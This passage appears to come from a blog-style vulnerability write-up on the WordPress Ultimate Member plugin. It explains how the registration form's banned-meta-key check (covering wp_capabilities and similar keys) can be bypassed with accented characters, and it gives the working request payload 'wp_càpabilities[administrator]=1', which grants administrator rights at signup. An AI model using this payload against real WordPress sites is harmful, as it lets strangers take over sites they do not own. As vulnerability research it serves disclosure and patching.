Super Admin
, Administrator
, Editor
, Author
, Contributor
, Contributor
, so how we can gain admin privilage ? well at fisrt lets see how does the ultimate member plugin works , first you need to configure the plugin in order to function well so we need to create a few pages in Pages
section then we link those pages to Ultimate member > setting after that we can make new roles or just use the default roles ultimate member offers.Subscriber
role and if we take a look at the wp_usermeta
table in mysql we can see the wp_capabilities
value is set to an serialize array and from there it defines our role wich in this case is Subscriber
.wp_capabilities
? well we can pass wp_capabilities
as an parameter in the post request while we registering like so:is_metakey_banned
and the function works by cheking few values such as "cap_key"
, "wp_capabilities"
, "wp_user_level"
, "user_activation_key"
etc... what we intrestin is wp_capabilities
but if we have it in our request boddy it'll hit the break
there to pervent us changeing our role.à, è, ì, ò, ù, À, È, Ì, Ò, Ù
, so now if we use this characters in our request body somthing like wp_càpabilities=administrator
what will happen? well it doesnt hit the break point on line 182 in class-user.php and we can bypass the is_metakey_banned
function.a:1:{s:13:"administrator";b:1;}
ok now lets try it and pass this straight to our parameter.wp_capabilities
of admin we can see is an serialized array thats what we whant so wordpress has its own serialization so we can use that to pass our value as an array then wordpress does the rest for us so here is how our payload looks like wp_càpabilities[administrator]=1
.